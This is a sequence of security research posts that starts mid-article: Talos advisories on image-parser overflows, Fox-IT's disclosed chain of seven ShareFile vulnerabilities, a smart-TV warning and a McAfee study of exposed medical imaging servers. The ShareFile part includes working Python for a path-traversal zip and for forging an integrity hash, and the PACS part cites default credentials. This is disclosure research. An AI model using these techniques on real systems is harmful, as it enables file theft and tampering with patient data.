The FIT file format stores image metadata in an ASCII header containing keyword-value pairs. The keyword-value pairs provide details such as origin format, comments and history. Several of the functions parsing the keywords are vulnerable to stack-based overflows. The error handling for many functions is incorrectly calculated, and when a crafted keyword-value is given, a stack-based buffer overflow can occur.

TALOS-2018-0529/CVE-2018-3846

This vulnerability arises in multiple areas throughout the code. The keyword-value/comment pairs are incorrectly checked for length in error messaging throughout. The error buffers used are not large enough, and a crafted value comment pair can cause an overflow. Most notably, this function arises in the main header parsing functionality.

TALOS-2018-0530/CVE-2018-3847

The fits_read_keyn function is responsible for parsing out a specific keyname, and returning the value comment pair. As described above, this vulnerability is present in the error handling of this function. By passing in a specially crafted image, an attacker can cause an error message in this function, and the error buffer is not large enough, causing a buffer overflow.

TALOS-2018-0531/CVE-2018-3848 - CVE-2018-3849

The fits_read_btblhdr function is responsible for getting data from a binary table inside a FITS image. This function's main purpose is to parse the header keywords and validate them to ensure they conform to the FITS standard. The fits_read_btblhdr function does not check the input properly on the error messaging, and is vulnerable against buffer overflows.

This vulnerability is similar to the vulnerability discussed above. The fits_read_atblhdr function is responsible for parsing an ASCII table inside a FITS image. It also does not handle errors properly, and is vulnerable to buffer overflows.

More details can be found in the Talos Vulnerability Reports TALOS-2018-0529, TALOS-2018-0530 and TALOS-2018-0531.


Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.


Snort Rule: 45697-45700, 45701-45714




Vulnerability Spotlight: Multiple Simple DirectMedia Layer Vulnerabilities

Discovered by Lilith Wyatt of Cisco Talos

Overview



Talos is disclosing several vulnerabilities identified in Simple DirectMedia Layer's SDL2_Image library that could allow code execution. Simple DirectMedia Layer is a cross-platform development library designed to provide low level access to audio, keyboard, mouse, joystick, and graphics hardware via OpenGL and Direct3D. It is used by video playback software, emulators, and popular games including Valve's award winning catalog and many Humble Bundle games. SDL officially supports Windows, Mac OS X, Linux, iOS, and Android. Support for other platforms may be found in the source code. The SDL2_Image library is an optional component for SDL that deals specifically with parsing and displaying a variety of image file formats, creating a single and uniform API for image processing, regardless of the type. The latest SDL version (2.0.8) can be found here.

TALOS-2018-0519  - Simple DirectMedia Layer SDL2_Image IMG_LoadPCX_RW Information Disclosure Vulnerability (CVE-2018-3837)



An exploitable vulnerability exists in the PCX image rendering functionality of SDL2_image-2.0.2. A specially crafted PCX image can cause an out-of-bounds read on the heap, resulting in information disclosure . An attacker can display a specially crafted image to trigger this vulnerability.

TALOS-2018-0520 - Simple DirectMedia Layer SDL2_Image load_xcf_tile_rle Information Disclosure Vulnerability (CVE-2018-3838)



Exploitable vulnerabilities exists in the XCF image rendering functionality of SDL2_image-2.0.2. A specially crafted XCF image can cause an out-of-bounds read on the heap, resulting in information disclosure. An attacker can display a specially crafted image to trigger this vulnerability.

TALOS-2018-0521 - Simple DirectMedia Layer SDL2_Image load_xcf_tile_rle bpp Code Execution Vulnerability (CVE-2018-3839)



Exploitable vulnerabilities exists in the XCF image rendering functionality of SDL2_image-2.0.2. A specially crafted XCF image can cause an out-of-bounds read on the heap, resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability.

Coverage



The following Snort rules will detect exploitation attempts. Note that additional rules may be

released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 45017-45018, 45599-45600,45605-45606

Vulnerability Spotlight: Multiple Computerinsel PhotoLine PSD Code Execution Vulnerabilities



Discovered by Tyler Bohan of Cisco Talos

Overview


Today, Cisco Talos is disclosing a vulnerability within Computerinsel PhotoLine's PSD-parsing functionality. Photoline is an image processing tool used to modify and edit images, as well as other graphic-related material. This product has a large user base and is popular in its specific field. The vulnerable component is in the handling of PSD documents. PSD is a document format used by Adobe Photoshop, and is supported by many third-party applications throughout the industry.

The vulnerability arises in parsing the PSD document. The application takes data directly from the document without verification and uses it to calculate an address. The document has a specially crafted blending channel value leading to this miscalculation. Below is the area of the crash.

TALOS-2018-0546 - Computerinsel Photoline TIFF Samples Per Pixel Parsing Code Execution Vulnerability (CVE-2018-3861)


A memory corruption vulnerability exists in the TIFF parsing functionality of Computerinsel Photoline 20.53. A specially crafted TIFF image processed via the application can lead to an out of bounds write overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0547 - Computerinsel Photoline TIFF Bits Per Pixel Parsing Code Execution Vulnerability (CVE-2018-3862)


A memory corruption vulnerability exists in the TIFF parsing functionality of Computerinsel Photoline 20.53. A specially crafted TIFF image processed via the application can lead to an out of bounds write overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0550 - Computerinsel Photoline PSD Blending Channels Code Execution Vulnerability (CVE-2018-0550)


A memory corruption vulnerability exists in the PSD-parsing functionality of Computerinsel PhotoLine 20.53. A specially crafted PSD document processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PSD document to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0561 - Computerinsel Photoline PCX Decompress Code Execution Vulnerability (CVE-2018-3886)


A memory corruption vulnerability exists in the PCX parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0562 - Computerinsel Photoline PCX Run Length Code Execution Vulnerability (CVE-2018-3887)


A memory corruption vulnerability exists in the PCX parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0563 - Computerinsel Photoline PCX Color Map Code Execution Vulnerability (CVE-2018-3888)


A memory corruption vulnerability exists in the PCX parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0564 - Computerinsel Photoline PCX Bits Per Pixel Code Execution Vulnerability (CVE-2018-3889)


A memory corruption vulnerability exists in the PCX parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out of bounds write overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

Known vulnerable versions


Computerinsel PhotoLine 20.53 for OS X

(https://www.pl32.com)

Coverage


The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Console or Snort.org.

Snort Rules: 39601-39632, 45997-46000, 46093-46094, 46222-46223, 46224-46225, 46143-46146, 46241-46242

Compromising Citrix ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities, which together allowed any account to (from the internet) access any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several fortune-500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the Cloud or with an on-premise component).

Sharefile

Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at name.sharefile.eu (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the filetransfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see a h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following python code creates a special zip file called out.zip, which contains two files, one of which has a relative path.

import sys, zipfile
#the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
#the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'xxe_oob.xml'
#destination path of the file
zf.write(fname, '../../../../testbestand_fox.tmp')
#random extra file (not required)
#example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path would be c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\ we can add a file with the name ../storage/subdirectory/filename.txt which will then be written to the target directory. The ../ part indicates that the Operating System should go one directory higher in the directory tree and use the rest of the path from that location.

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistenstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:

Info.txt

In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying to figure out for a while what kind of hashing algorithm was used for the integrity check of this file, it turned out that it is a simple md5 hash of the rest of the data in the info.txt file. The twist here is that the data is encoded with UTF-16-LE, which is default for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import md5
with open('info_modified.txt','r') as infile:
instr = infile.read().strip().split('|')
instr2 = u'|'.join(instr[:-1])
outhash = md5.new(instr2.encode('utf-16-le')).hexdigest().upper()
with open('info_out.txt','w') as outfile:
outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as temporary name for the file. The data that is uploaded is written to this file, and when the upload is finilized this file is added to the users ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename to attempt to extract a test file called secret.txt which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the filesize of the secret.txt file we are trying to extract is 14 bytes instead of 13 as the modified info.txt indicated. We can upload a new info.txt file which does have the correct filesize, and the secret.txt file is succesfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we do know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the frequested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter which contains the download token. Additionally there is a h parameter which contains a HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<!--?xml version="1.0" encoding="utf-8"?--><!--?xml version="1.0" encoding="utf-8"?--><?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<DownloadTokenID>dt6bbd1e278a634e1bbde9b94ff8460b24</DownloadTokenID>
<RequestType>single</RequestType>
<BaseUrl>https://redacted.sf-api.eu/</BaseUrl>
<ErrorUrl>https://redacted.sf-api.eu//error.aspx?type=storagecenter-downloadprep</ErrorUrl>
<StorageBasePath>\\s3\sf-eu-1\;</StorageBasePath>
<BatchID>dt6bbd1e278a634e1bbde9b94ff8460b24</BatchID>
<ZipFileName>tfile</ZipFileName>
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Metadata>
<Item key="operatingsystem" value="Linux" />
</Metadata>
<IrmEnabled>false</IrmEnabled>
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<Items>
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
</Items>
<Log>
<EventID>fif11465-ba81-8b77-7dd9-4256bc375017</EventID>
<UserID>c7add7af-91ac-4331-b48a-0aeed4a58687</UserID>
<OwnerID>c7add7af-91ac-4331-b48a-0aeed4a58687</OwnerID>
<AccountID>a4ea881a-a4d5-433a-fa44-41acd5ed5a5f</AccountID>
<UserEmailAddress>fox-it@redacted</UserEmailAddress>
<Name>tfile</Name>
<FileCount>1</FileCount>
<AdditionalInfo>fif11465-ba81-8b77-7dd9-4256bc375017</AdditionalInfo>
<FolderID>foh160ab-aa5a-4e43-96fd-e41caed36cea</FolderID>
<ParentID>foh160ab-aa5a-4e43-96fd-e41caed36cea</ParentID>
<Path>/root/a4ea881a-a4d5-433a-fa44-41acd5ed5a5f/foh160ab-aa5a-4e43-96fd-e41caed36cea</Path>
<IncrementDownloadCount>false</IncrementDownloadCount>
<ShareID />
</Log>
</ShareFileDownloadInfo>

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a program written in .NET and running under IIS, it is trivial to decompile the binaries with toos such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML files integrity integrity not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not nessecary to calculate the signature as an attacker, since the application simply tells you what correct signature is if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation taking place of this path, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains a HMAC, which makes modifying this parameter seemingly impossible:

HMAC Url

However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the url before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:

uploadid-double.png

We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values which are separated with a comma. Only the first uploadid parameter is verified by the HMAC, since it operates on the query string instead of the individual parameter values, and only verifies the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Polution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attackers account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.

Conclusion

By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML files integrity integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick with following up on the issues and rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown if they were using the hybrid setup in a vulnerable configuration. Therefor, the number of affected installations and if these issues were abused is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

New Vulnerabilities in Smart TVs Could Allow Hackers to Spy on Users

As recent events like CES and MWC have proved, the popularity of connected devices is showing no signs of slowing. Everything has been transformed into smart: lightbulbs, ovens, sprinkler systems – with one of the first trailblazers being the smart TV. And now, it’s been discovered that smart TVs may be vulnerable to cyberattacks, as the independent security software tester AV-Comparatives and sigma star gmbh informed the general public of several critical vulnerabilities in Vestel firmware, which is used in more than 30 popular TV brands, including Medion. These vulnerabilities could be leveraged to spy on smart TV users.

This discovery began back in March 2017 when news emerged that it may be possible to hack into smart TVs to spy on users. Hearing this news, AV-Comparatives decided to perform a quick security check on the Medion smart TV and discovered a handful of vulnerabilities. AV-Comparatives asked sigma star gmbh (which specializes in IoT) to analyze these issues, and the company confirmed their severity. And though the groups informed Vestel and Medion already about these flaws, not all have been addressed.

Now, Medion has requested to further investigate a few outstanding vulnerabilities, which means a firmware update is not on the way just yet. So, in the interim, be sure to follow these security tips to ensure you stay secure while utilizing smart TVs:

  • Buy smart TVs with security in mind. When purchasing a smart TV, it’s always important to do your homework and read up on any current vulnerabilities. That way, you can make an informed purchase.
  • Update regularly. It’s an important security rule of thumb: always update any software whenever an update is available, as security patches are usually included with each new version. And even though fixes for these particular flaws have not been issued yet, they should be soon on the way. 
  • Secure your home’s internet at the source. Smart TVs, like all connected devices, have to connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose your network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post New Vulnerabilities in Smart TVs Could Allow Hackers to Spy on Users appeared first on McAfee Blogs.

McAfee Researchers Find Poor Security Exposes Medical Data to Cybercriminals

The nonperishable nature of medical data makes an irresistible target for cybercriminals. The art of hacking requires significant time and effort, encouraging experienced cybercriminals to plot their attacks based on the return they will see from their investment. Those who have successfully gained access to medical data have been well rewarded for their efforts. One seller stated in an interview that “someone wanted to buy all the … records specifically,” claiming that the effort had netted US$100,000.

While at a doctor’s appointment with my wife watching a beautiful 4D ultrasound of our unborn child, I noticed the words “saving data to image” flash on the screen. Although this phrase would not catch the attention of most people, given my research on how cybercriminals are targeting the health care industry, I quickly began to wonder why an ultrasound of our child would not instead save to a file. Intrigued, I decided to dig into the world of medical imaging and its possible security risks. The results were disturbing; ultimately, we were able to combine attack vectors to reconstruct body parts from the images and make a three-dimensional model.

PACS

Most hospitals or medical research facilities use PACS, for picture archiving and communication system, so that images such as ultrasounds, mammograms, MRIs, etc. can be accessed from the various systems within their facility, or through the cloud.

A PACS setup contains multiple components, including a workstation, imaging device, acquisition gateway, PACS controller, database, and archiving—as illustrated in the following graphic:

The basic elements of PACS infrastructure.

The imaging device creates a picture, such as an ultrasound or MRI, which is uploaded to an acquisition gateway. Because much of the imaging equipment in use by medical facilities does not align with security best practices, acquisition gateways are placed in the network to enable the digital exchange of the images. The acquisition gateway also often acts as the server connecting to the hospital’s information system (using the HL7 protocol) to enrich images with patient data.

The PACS controller is the central unit coordinating all traffic among the different components. The final component in the PACS infrastructure is the database and archiving system. The system ensures that all images are correctly stored and labeled for either short- or long-term storage.

Larger implementations might have multiple imaging devices and acquisition gateways in various locations, connected over the Internet. During our investigation, we noticed many small medical practices around the world using free, open-source PACS software, which was not always securely implemented.

To determine how many PACS servers are connected depends on on how you search using Shodan, a search engine for finding specific types of computers connected to the Internet. Some servers connect over TCP 104; others use HTTP TCP 80 or HTTPS TCP 443. A quick search revealed more than 1,100 PACS directly connected to the Internet, not behind a recommended layer of network security measures or virtual private networks (VPNs).

PACS systems connected to the Internet. Darker colors represent more systems.

Our eyebrows began to rise very early in our research, as we came across “IE 6 support only” messages or ActiveX controls and old Java support; many of these products are vulnerable to a plethora of exploits. For example, one of the PACS generated an error page when we changed one parameter. This is a very basic common way of testing if the application developers did proper input sanitation check to prevent attackers inserting code or generating failures that could reveal data about the application and can give clues to compromise the system.

A stack-trace error.

The stack-trace dump revealed the use of Apache Tomcat Version 7.0.13, which has more than 40 vulnerabilities.

When communicating with the DICOM (digital imaging and communications in medicine) port, TCP 104, it is possible to grab the banner of a server and get a response. As we queried, we recorded different responses. Let’s look at one:

\x02\x00\x00\x00\x00\xbe\x00\x01\x00\x00ANY-SCP         FINDSCU         \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x151.2.840.10008.3.1.1.1!\x00\x00\x1b\x01\x00\x00\x00@\x00\x00\x131.2.840.10008.1.2.1P\x00\x00>Q\x00\x00\x04\x00\x00@\x00R\x00\x00"1.2.826.0.1.3680043.2.135.1066.101U\x00\x00\x0c1.4.16/WIN32

 

The FINDSCU string refers to the findscu tool, which can be used to query a PACS system. The DICOM standard defines three data models for the query/retrieve service. Each data model has been assigned with one unique ID for the C-FIND, one for the C-MOVE, and one for C-GET; so all together there are nine unique IDs, three for each model. In the preceding banner, we retrieved two of those IDs:

  • 2.840.10008.1.2.1: A transfer unique ID that defines the value “Explicit VR Little Endian” for data transfer
  • 2.826.0.1.3680043.2.135.1066.101: A value referring to the implementation class

Another value in the banner, “1.4.16/WIN32,” refers to the implementation version. In the context of the medical servers, this refers to the version of XAMPP, aka Apache with MariaDB, PHP, and Perl. This server was running Apache 2.4.9, which is publicly known to contain nine vulnerabilities.

In other cases, there was no need to search for vulnerabilities. The management interface was wide open and could be accessed without credentials.

What does this mean? It is possible to access the images.

Vulnerabilities

In addition to expensive commercial PACS systems, open-source or small-fee PACS are available for small health care institutions or practices. As we investigated these systems, we found that our fears were well founded. One web server/client setup used the defaults “admin/password” as credentials without enforcing a change when the server is started for the first time. We found more problems:

  • Unencrypted traffic between client and server
  • Click jacking
  • Cross-site scripting (reflected)
  • Cross-site scripting stored as cross-site request forgery
  • Document object model–based link manipulation
  • Remote creation of admin accounts
  • Disclosure of information

Many of these are ranked on the list of OWASP Top 10 Most Critical Web Application Security Risks list, which highlights severe flaws that should be addressed in any product delivered to a customer.

We have reported the vulnerabilities we discovered to these vendors following our responsible disclosure process. They cooperated with us in investigating the vulnerabilities and taking appropriate actions to fix the issues.

But why should we spend so much time and effort in researching vulnerabilities when there are many other ways to retrieve medical images from the Internet?

Medical Image Formats

The medical world uses several image formats for different purposes. Each format has different requirements and works with different equipment, protocols, etc. A few format examples:

  • NifTi Neuroimaging Informatics Technology Initiative
  • Dicom Digital Imaging and Communications in Medicine
  • MINC Medical Imaging NetCDF
  • NRRD Nearly Raw Raster Data

Searching open directories and FTP servers while using several search engines, we gathered thousands of images—some of them complete MRI scans, mostly in DICOM format. One example:

An open directory of images.

The DICOM format originated in the 1980s, before cybersecurity was a key component. The standard format contains a detailed list of tags such as patient name, station name, hospital, etc. All are included as metadata with the image.

Opening an image with a text editor presents the following screen:

An example of the DICOM file format.

The file begins with the prefix DICM, an indicator that we are dealing with a DICOM file.  Other (now obscured) strings in this example include the hospital’s name, city, patient name, and more.

The Health Insurance Portability and Accountability Act requires a secure medical imaging workflow, which includes the removal or anonymizing of metadata in DICOM files. Researching the retrieved files from open sources and directories, we discovered most of the images still contained this metadata, such as in the following example, from which we extracted (obscured) personally identifiable information (PII).

Metadata discovered in a DICOM file.

Combining Vulnerabilities and Metadata

We combined possible vulnerabilities and the metadata to create a test scenario, installing information from a dummy patient, including an x-ray picture of a knee, to the vulnerable PACS server.

Our test patient record, followed by an x-ray of a knee. 

Using vulnerability information gathered in an earlier phase of research, we launched an attack to gain access to the PACS server. Once we had access, we downloaded the image from our dummy patient and altered the metadata of the image series, changing all references of “knee” to “elbow.”

Altered metadata of the test patient image.

We then saved the picture and uploaded it to the server. Checking the records of our dummy patient, we found our changes were successful.

Changes successfully updated.

Reconstructing Body Parts

In the medical imaging world, a large array of software can investigate and visualize images in different ways, for example, in 3D. We took our collection of images, and using a demo version of 3D software, we reconstructed complete 3D models of vertebrae, pelvis, knees, etc. and, in one case, we reconstructed a partial face.

Because we firmly believe in protecting privacy, the following example—a series of images from a pelvis—comes from a demo file that accompanies the software.

An example of a series of images.

After selecting areas of interest and adjusting the levels, we generated a 3D model of the pelvis:

A 3D model of the pelvis.

The application that generated the 3D model has a feature that allowed us to export the model in several data formats to be used by other 3D drawing programs. After the export, we imported the data into a 3D drawing program and converted the file to STL, a popular format for 3D objects and printers.

In short, we began with files from open directories, transformed them into a 3D model, and printed a tangible model using a 3D printer:

Our 3D model of a pelvis.

Conclusion

